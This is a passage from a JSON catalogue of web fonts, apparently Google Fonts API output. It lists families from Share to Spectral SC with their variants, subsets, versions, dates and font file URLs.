        "regular": "http://fonts.gstatic.com/s/share/v11/i7dEIFliZjKNF5VNHLq2cV5d.ttf",
        "italic": "http://fonts.gstatic.com/s/share/v11/i7dKIFliZjKNF6VPFr6UdE5dWFM.ttf",
        "700": "http://fonts.gstatic.com/s/share/v11/i7dJIFliZjKNF63xM56-WkJUQUq7.ttf",
        "700italic": "http://fonts.gstatic.com/s/share/v11/i7dPIFliZjKNF6VPLgK7UEZ2RFq7AwU.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Share Tech",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sharetech/v10/7cHtv4Uyi5K0OeZ7bohUwHoDmTcibrA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Share Tech Mono",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sharetechmono/v10/J7aHnp1uDWRBEqV98dVQztYldFc7pAsEIc3Xew.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Shojumaru",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/shojumaru/v8/rax_HiWfutkLLnaKCtlMBBJek0vA8A.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Short Stack",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/shortstack/v10/bMrzmS2X6p0jZC6EcmPFX-SScX8D0nq6.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Shrikhand",
      "variants": [
        "regular"
      ],
      "subsets": [
        "gujarati",
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/shrikhand/v6/a8IbNovtLWfR7T7bMJwbBIiQ0zhMtA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Siemreap",
      "variants": [
        "regular"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/siemreap/v13/Gg82N5oFbgLvHAfNl2YbnA8DLXpe.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sigmar One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sigmarone/v11/co3DmWZ8kjZuErj9Ta3dk6Pjp3Di8U0.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Signika",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v11",
      "lastModified": "2020-07-15",
      "files": {
        "300": "http://fonts.gstatic.com/s/signika/v11/vEFO2_JTCgwQ5ejvMV0O96D01E8J0tIJHJbGhs_cfKe1.ttf",
        "regular": "http://fonts.gstatic.com/s/signika/v11/vEFO2_JTCgwQ5ejvMV0O96D01E8J0tJXHJbGhs_cfKe1.ttf",
        "500": "http://fonts.gstatic.com/s/signika/v11/vEFO2_JTCgwQ5ejvMV0O96D01E8J0tJlHJbGhs_cfKe1.ttf",
        "600": "http://fonts.gstatic.com/s/signika/v11/vEFO2_JTCgwQ5ejvMV0O96D01E8J0tKJG5bGhs_cfKe1.ttf",
        "700": "http://fonts.gstatic.com/s/signika/v11/vEFO2_JTCgwQ5ejvMV0O96D01E8J0tKwG5bGhs_cfKe1.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Signika Negative",
      "variants": [
        "300",
        "regular",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/signikanegative/v11/E217_cfngu7HiRpPX3ZpNE4kY5zKal6DipHD6z_iXAs.ttf",
        "regular": "http://fonts.gstatic.com/s/signikanegative/v11/E218_cfngu7HiRpPX3ZpNE4kY5zKUvKrrpno9zY.ttf",
        "600": "http://fonts.gstatic.com/s/signikanegative/v11/E217_cfngu7HiRpPX3ZpNE4kY5zKaiqFipHD6z_iXAs.ttf",
        "700": "http://fonts.gstatic.com/s/signikanegative/v11/E217_cfngu7HiRpPX3ZpNE4kY5zKak6EipHD6z_iXAs.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Simonetta",
      "variants": [
        "regular",
        "italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/simonetta/v11/x3dickHVYrCU5BU15c4BfPACvy_1BA.ttf",
        "italic": "http://fonts.gstatic.com/s/simonetta/v11/x3dkckHVYrCU5BU15c4xfvoGnSrlBBsy.ttf",
        "900": "http://fonts.gstatic.com/s/simonetta/v11/x3dnckHVYrCU5BU15c45-N0mtwTpDQIrGg.ttf",
        "900italic": "http://fonts.gstatic.com/s/simonetta/v11/x3d5ckHVYrCU5BU15c4xfsKCsA7tLwc7Gn88.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Single Day",
      "variants": [
        "regular"
      ],
      "subsets": [
        "korean"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/singleday/v2/LYjHdGDjlEgoAcF95EI5jVoFUNfeQJU.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sintony",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sintony/v8/XoHm2YDqR7-98cVUITQnu98ojjs.ttf",
        "700": "http://fonts.gstatic.com/s/sintony/v8/XoHj2YDqR7-98cVUGYgIn9cDkjLp6C8.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sirin Stencil",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sirinstencil/v9/mem4YaWwznmLx-lzGfN7MdRydchGBq6al6o.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Six Caps",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sixcaps/v11/6ae_4KGrU7VR7bNmabcS9XXaPCop.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Skranji",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/skranji/v8/OZpDg_dtriVFNerMYzuuklTm3Ek.ttf",
        "700": "http://fonts.gstatic.com/s/skranji/v8/OZpGg_dtriVFNerMW4eBtlzNwED-b4g.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Slabo 13px",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/slabo13px/v8/11hEGp_azEvXZUdSBzzRcKer2wkYnvI.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Slabo 27px",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-09-10",
      "files": {
        "regular": "http://fonts.gstatic.com/s/slabo27px/v7/mFT0WbgBwKPR_Z4hGN2qsxgJ1EJ7i90.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Slackey",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/slackey/v11/N0bV2SdQO-5yM0-dKlRaJdbWgdY.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Smokum",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/smokum/v11/TK3iWkUbAhopmrdGHjUHte5fKg.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Smythe",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/smythe/v11/MwQ3bhT01--coT1BOLh_uGInjA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sniglet",
      "variants": [
        "regular",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sniglet/v12/cIf9MaFLtkE3UjaJxCmrYGkHgIs.ttf",
        "800": "http://fonts.gstatic.com/s/sniglet/v12/cIf4MaFLtkE3UjaJ_ImHRGEsnIJkWL4.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Snippet",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/snippet/v10/bWt47f7XfQH9Gupu2v_Afcp9QWc.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Snowburst One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/snowburstone/v8/MQpS-WezKdujBsXY3B7I-UT7eZ-UPyacPbo.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sofadi One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sofadione/v9/JIA2UVBxdnVBuElZaMFGcDOIETkmYDU.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sofia",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sofia/v9/8QIHdirahM3j_vu-sowsrqjk.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Solway",
      "variants": [
        "300",
        "regular",
        "500",
        "700",
        "800"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v3",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/solway/v3/AMOTz46Cs2uTAOCuLlgZms0QW3mqyg.ttf",
        "regular": "http://fonts.gstatic.com/s/solway/v3/AMOQz46Cs2uTAOCWgnA9kuYMUg.ttf",
        "500": "http://fonts.gstatic.com/s/solway/v3/AMOTz46Cs2uTAOCudlkZms0QW3mqyg.ttf",
        "700": "http://fonts.gstatic.com/s/solway/v3/AMOTz46Cs2uTAOCuPl8Zms0QW3mqyg.ttf",
        "800": "http://fonts.gstatic.com/s/solway/v3/AMOTz46Cs2uTAOCuIlwZms0QW3mqyg.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Song Myung",
      "variants": [
        "regular"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/songmyung/v8/1cX2aUDWAJH5-EIC7DIhr1GqhcitzeM.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sonsie One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sonsieone/v9/PbymFmP_EAnPqbKaoc18YVu80lbp8JM.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sora",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v1",
      "lastModified": "2020-07-13",
      "files": {
        "100": "http://fonts.gstatic.com/s/sora/v1/xMQOuFFYT72X5wkB_18qmnndmSdSn3-KIwNhBti0.ttf",
        "200": "http://fonts.gstatic.com/s/sora/v1/xMQOuFFYT72X5wkB_18qmnndmSfSnn-KIwNhBti0.ttf",
        "300": "http://fonts.gstatic.com/s/sora/v1/xMQOuFFYT72X5wkB_18qmnndmScMnn-KIwNhBti0.ttf",
        "regular": "http://fonts.gstatic.com/s/sora/v1/xMQOuFFYT72X5wkB_18qmnndmSdSnn-KIwNhBti0.ttf",
        "500": "http://fonts.gstatic.com/s/sora/v1/xMQOuFFYT72X5wkB_18qmnndmSdgnn-KIwNhBti0.ttf",
        "600": "http://fonts.gstatic.com/s/sora/v1/xMQOuFFYT72X5wkB_18qmnndmSeMmX-KIwNhBti0.ttf",
        "700": "http://fonts.gstatic.com/s/sora/v1/xMQOuFFYT72X5wkB_18qmnndmSe1mX-KIwNhBti0.ttf",
        "800": "http://fonts.gstatic.com/s/sora/v1/xMQOuFFYT72X5wkB_18qmnndmSfSmX-KIwNhBti0.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sorts Mill Goudy",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sortsmillgoudy/v10/Qw3GZR9MED_6PSuS_50nEaVrfzgEXH0OjpM75PE.ttf",
        "italic": "http://fonts.gstatic.com/s/sortsmillgoudy/v10/Qw3AZR9MED_6PSuS_50nEaVrfzgEbH8EirE-9PGLfQ.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Source Code Pro",
      "variants": [
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v13",
      "lastModified": "2020-09-25",
      "files": {
        "200": "http://fonts.gstatic.com/s/sourcecodepro/v13/HI_XiYsKILxRpg3hIP6sJ7fM7Pqt8srztO0rzmmkDQ.ttf",
        "200italic": "http://fonts.gstatic.com/s/sourcecodepro/v13/HI_ViYsKILxRpg3hIP6sJ7fM7PqlONMbtecv7Gy0DRzS.ttf",
        "300": "http://fonts.gstatic.com/s/sourcecodepro/v13/HI_XiYsKILxRpg3hIP6sJ7fM7PqtlsnztO0rzmmkDQ.ttf",
        "300italic": "http://fonts.gstatic.com/s/sourcecodepro/v13/HI_ViYsKILxRpg3hIP6sJ7fM7PqlONN_tucv7Gy0DRzS.ttf",
        "regular": "http://fonts.gstatic.com/s/sourcecodepro/v13/HI_SiYsKILxRpg3hIP6sJ7fM7PqVOuHXvMY3xw.ttf",
        "italic": "http://fonts.gstatic.com/s/sourcecodepro/v13/HI_QiYsKILxRpg3hIP6sJ7fM7PqlOOvTnsMnx3C9.ttf",
        "500": "http://fonts.gstatic.com/s/sourcecodepro/v13/HI_XiYsKILxRpg3hIP6sJ7fM7PqtzsjztO0rzmmkDQ.ttf",
        "500italic": "http://fonts.gstatic.com/s/sourcecodepro/v13/HI_ViYsKILxRpg3hIP6sJ7fM7PqlONMnt-cv7Gy0DRzS.ttf",
        "600": "http://fonts.gstatic.com/s/sourcecodepro/v13/HI_XiYsKILxRpg3hIP6sJ7fM7Pqt4s_ztO0rzmmkDQ.ttf",
        "600italic": "http://fonts.gstatic.com/s/sourcecodepro/v13/HI_ViYsKILxRpg3hIP6sJ7fM7PqlONMLsOcv7Gy0DRzS.ttf",
        "700": "http://fonts.gstatic.com/s/sourcecodepro/v13/HI_XiYsKILxRpg3hIP6sJ7fM7Pqths7ztO0rzmmkDQ.ttf",
        "700italic": "http://fonts.gstatic.com/s/sourcecodepro/v13/HI_ViYsKILxRpg3hIP6sJ7fM7PqlONNvsecv7Gy0DRzS.ttf",
        "900": "http://fonts.gstatic.com/s/sourcecodepro/v13/HI_XiYsKILxRpg3hIP6sJ7fM7PqtvszztO0rzmmkDQ.ttf",
        "900italic": "http://fonts.gstatic.com/s/sourcecodepro/v13/HI_ViYsKILxRpg3hIP6sJ7fM7PqlONNXs-cv7Gy0DRzS.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Source Sans Pro",
      "variants": [
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v14",
      "lastModified": "2020-09-15",
      "files": {
        "200": "http://fonts.gstatic.com/s/sourcesanspro/v14/6xKydSBYKcSV-LCoeQqfX1RYOo3i94_AkB1v_8CGxg.ttf",
        "200italic": "http://fonts.gstatic.com/s/sourcesanspro/v14/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZYokRdr3cWWxg40.ttf",
        "300": "http://fonts.gstatic.com/s/sourcesanspro/v14/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zAkB1v_8CGxg.ttf",
        "300italic": "http://fonts.gstatic.com/s/sourcesanspro/v14/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkhdr3cWWxg40.ttf",
        "regular": "http://fonts.gstatic.com/s/sourcesanspro/v14/6xK3dSBYKcSV-LCoeQqfX1RYOo3aP6TkmDZz9g.ttf",
        "italic": "http://fonts.gstatic.com/s/sourcesanspro/v14/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPa7gujNj9tmf.ttf",
        "600": "http://fonts.gstatic.com/s/sourcesanspro/v14/6xKydSBYKcSV-LCoeQqfX1RYOo3i54rAkB1v_8CGxg.ttf",
        "600italic": "http://fonts.gstatic.com/s/sourcesanspro/v14/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZY4lBdr3cWWxg40.ttf",
        "700": "http://fonts.gstatic.com/s/sourcesanspro/v14/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vAkB1v_8CGxg.ttf",
        "700italic": "http://fonts.gstatic.com/s/sourcesanspro/v14/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclRdr3cWWxg40.ttf",
        "900": "http://fonts.gstatic.com/s/sourcesanspro/v14/6xKydSBYKcSV-LCoeQqfX1RYOo3iu4nAkB1v_8CGxg.ttf",
        "900italic": "http://fonts.gstatic.com/s/sourcesanspro/v14/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZklxdr3cWWxg40.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Source Serif Pro",
      "variants": [
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v10",
      "lastModified": "2020-09-25",
      "files": {
        "200": "http://fonts.gstatic.com/s/sourceserifpro/v10/neIXzD-0qpwxpaWvjeD0X88SAOeasbsfhSugxYUvZrI.ttf",
        "200italic": "http://fonts.gstatic.com/s/sourceserifpro/v10/neIVzD-0qpwxpaWvjeD0X88SAOeauXEGbSqqwacqdrKvbQ.ttf",
        "300": "http://fonts.gstatic.com/s/sourceserifpro/v10/neIXzD-0qpwxpaWvjeD0X88SAOeasd8chSugxYUvZrI.ttf",
        "300italic": "http://fonts.gstatic.com/s/sourceserifpro/v10/neIVzD-0qpwxpaWvjeD0X88SAOeauXEGCSmqwacqdrKvbQ.ttf",
        "regular": "http://fonts.gstatic.com/s/sourceserifpro/v10/neIQzD-0qpwxpaWvjeD0X88SAOeaiXM0oSOL2Yw.ttf",
        "italic": "http://fonts.gstatic.com/s/sourceserifpro/v10/neIWzD-0qpwxpaWvjeD0X88SAOeauXE-pQGOyYw2fw.ttf",
        "600": "http://fonts.gstatic.com/s/sourceserifpro/v10/neIXzD-0qpwxpaWvjeD0X88SAOeasasahSugxYUvZrI.ttf",
        "600italic": "http://fonts.gstatic.com/s/sourceserifpro/v10/neIVzD-0qpwxpaWvjeD0X88SAOeauXEGfS-qwacqdrKvbQ.ttf",
        "700": "http://fonts.gstatic.com/s/sourceserifpro/v10/neIXzD-0qpwxpaWvjeD0X88SAOeasc8bhSugxYUvZrI.ttf",
        "700italic": "http://fonts.gstatic.com/s/sourceserifpro/v10/neIVzD-0qpwxpaWvjeD0X88SAOeauXEGGS6qwacqdrKvbQ.ttf",
        "900": "http://fonts.gstatic.com/s/sourceserifpro/v10/neIXzD-0qpwxpaWvjeD0X88SAOeasfcZhSugxYUvZrI.ttf",
        "900italic": "http://fonts.gstatic.com/s/sourceserifpro/v10/neIVzD-0qpwxpaWvjeD0X88SAOeauXEGISyqwacqdrKvbQ.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Space Grotesk",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-11-03",
      "files": {
        "300": "http://fonts.gstatic.com/s/spacegrotesk/v1/V8mQoQDjQSkFtoMM3T6r8E7mF71Q-gOoraIAEj62UUsjNsFjTDJK.ttf",
        "regular": "http://fonts.gstatic.com/s/spacegrotesk/v1/V8mQoQDjQSkFtoMM3T6r8E7mF71Q-gOoraIAEj7oUUsjNsFjTDJK.ttf",
        "500": "http://fonts.gstatic.com/s/spacegrotesk/v1/V8mQoQDjQSkFtoMM3T6r8E7mF71Q-gOoraIAEj7aUUsjNsFjTDJK.ttf",
        "600": "http://fonts.gstatic.com/s/spacegrotesk/v1/V8mQoQDjQSkFtoMM3T6r8E7mF71Q-gOoraIAEj42VksjNsFjTDJK.ttf",
        "700": "http://fonts.gstatic.com/s/spacegrotesk/v1/V8mQoQDjQSkFtoMM3T6r8E7mF71Q-gOoraIAEj4PVksjNsFjTDJK.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Space Mono",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/spacemono/v6/i7dPIFZifjKcF5UAWdDRUEZ2RFq7AwU.ttf",
        "italic": "http://fonts.gstatic.com/s/spacemono/v6/i7dNIFZifjKcF5UAWdDRYER8QHi-EwWMbg.ttf",
        "700": "http://fonts.gstatic.com/s/spacemono/v6/i7dMIFZifjKcF5UAWdDRaPpZYFKQHwyVd3U.ttf",
        "700italic": "http://fonts.gstatic.com/s/spacemono/v6/i7dSIFZifjKcF5UAWdDRYERE_FeaGy6QZ3WfYg.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Spartan",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v2",
      "lastModified": "2020-06-26",
      "files": {
        "100": "http://fonts.gstatic.com/s/spartan/v2/l7gAbjR61M69yt8Z8w6FZf9WoBxdBrGFuG6OChXtf4qS.ttf",
        "200": "http://fonts.gstatic.com/s/spartan/v2/l7gAbjR61M69yt8Z8w6FZf9WoBxdBrEFuW6OChXtf4qS.ttf",
        "300": "http://fonts.gstatic.com/s/spartan/v2/l7gAbjR61M69yt8Z8w6FZf9WoBxdBrHbuW6OChXtf4qS.ttf",
        "regular": "http://fonts.gstatic.com/s/spartan/v2/l7gAbjR61M69yt8Z8w6FZf9WoBxdBrGFuW6OChXtf4qS.ttf",
        "500": "http://fonts.gstatic.com/s/spartan/v2/l7gAbjR61M69yt8Z8w6FZf9WoBxdBrG3uW6OChXtf4qS.ttf",
        "600": "http://fonts.gstatic.com/s/spartan/v2/l7gAbjR61M69yt8Z8w6FZf9WoBxdBrFbvm6OChXtf4qS.ttf",
        "700": "http://fonts.gstatic.com/s/spartan/v2/l7gAbjR61M69yt8Z8w6FZf9WoBxdBrFivm6OChXtf4qS.ttf",
        "800": "http://fonts.gstatic.com/s/spartan/v2/l7gAbjR61M69yt8Z8w6FZf9WoBxdBrEFvm6OChXtf4qS.ttf",
        "900": "http://fonts.gstatic.com/s/spartan/v2/l7gAbjR61M69yt8Z8w6FZf9WoBxdBrEsvm6OChXtf4qS.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Special Elite",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/specialelite/v11/XLYgIZbkc4JPUL5CVArUVL0nhncESXFtUsM.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Spectral",
      "variants": [
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2019-07-16",
      "files": {
        "200": "http://fonts.gstatic.com/s/spectral/v6/rnCs-xNNww_2s0amA9v2s13GY_etWWIJ.ttf",
        "200italic": "http://fonts.gstatic.com/s/spectral/v6/rnCu-xNNww_2s0amA9M8qrXHafOPXHIJErY.ttf",
        "300": "http://fonts.gstatic.com/s/spectral/v6/rnCs-xNNww_2s0amA9uSsF3GY_etWWIJ.ttf",
        "300italic": "http://fonts.gstatic.com/s/spectral/v6/rnCu-xNNww_2s0amA9M8qtHEafOPXHIJErY.ttf",
        "regular": "http://fonts.gstatic.com/s/spectral/v6/rnCr-xNNww_2s0amA-M-mHnOSOuk.ttf",
        "italic": "http://fonts.gstatic.com/s/spectral/v6/rnCt-xNNww_2s0amA9M8kn3sTfukQHs.ttf",
        "500": "http://fonts.gstatic.com/s/spectral/v6/rnCs-xNNww_2s0amA9vKsV3GY_etWWIJ.ttf",
        "500italic": "http://fonts.gstatic.com/s/spectral/v6/rnCu-xNNww_2s0amA9M8qonFafOPXHIJErY.ttf",
        "600": "http://fonts.gstatic.com/s/spectral/v6/rnCs-xNNww_2s0amA9vmtl3GY_etWWIJ.ttf",
        "600italic": "http://fonts.gstatic.com/s/spectral/v6/rnCu-xNNww_2s0amA9M8qqXCafOPXHIJErY.ttf",
        "700": "http://fonts.gstatic.com/s/spectral/v6/rnCs-xNNww_2s0amA9uCt13GY_etWWIJ.ttf",
        "700italic": "http://fonts.gstatic.com/s/spectral/v6/rnCu-xNNww_2s0amA9M8qsHDafOPXHIJErY.ttf",
        "800": "http://fonts.gstatic.com/s/spectral/v6/rnCs-xNNww_2s0amA9uetF3GY_etWWIJ.ttf",
        "800italic": "http://fonts.gstatic.com/s/spectral/v6/rnCu-xNNww_2s0amA9M8qt3AafOPXHIJErY.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Spectral SC",
      "variants": [
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v5",
      "lastModified": "2019-07-16",
      "files": {
        "200": "http://fonts.gstatic.com/s/spectralsc/v5/Ktk0ALCRZonmalTgyPmRfs1qwkTXPYeVXJZB.ttf",
        "200italic": "http://fonts.gstatic.com/s/spectralsc/v5/Ktk2ALCRZonmalTgyPmRfsWg26zWN4O3WYZB_sU.ttf",
        "300": "http://fonts.gstatic.com/s/spectralsc/v5/Ktk0ALCRZonmalTgyPmRfs0OwUTXPYeVXJZB.ttf",
        "300italic": "http://fonts.gstatic.com/s/spectralsc/v5/Ktk2ALCRZonmalTgyPmRfsWg28jVN4O3WYZB_sU.ttf",
        "regular": "http://fonts.gstatic.com/s/spectralsc/v5/KtkpALCRZonmalTgyPmRfvWi6WDfFpuc.ttf",
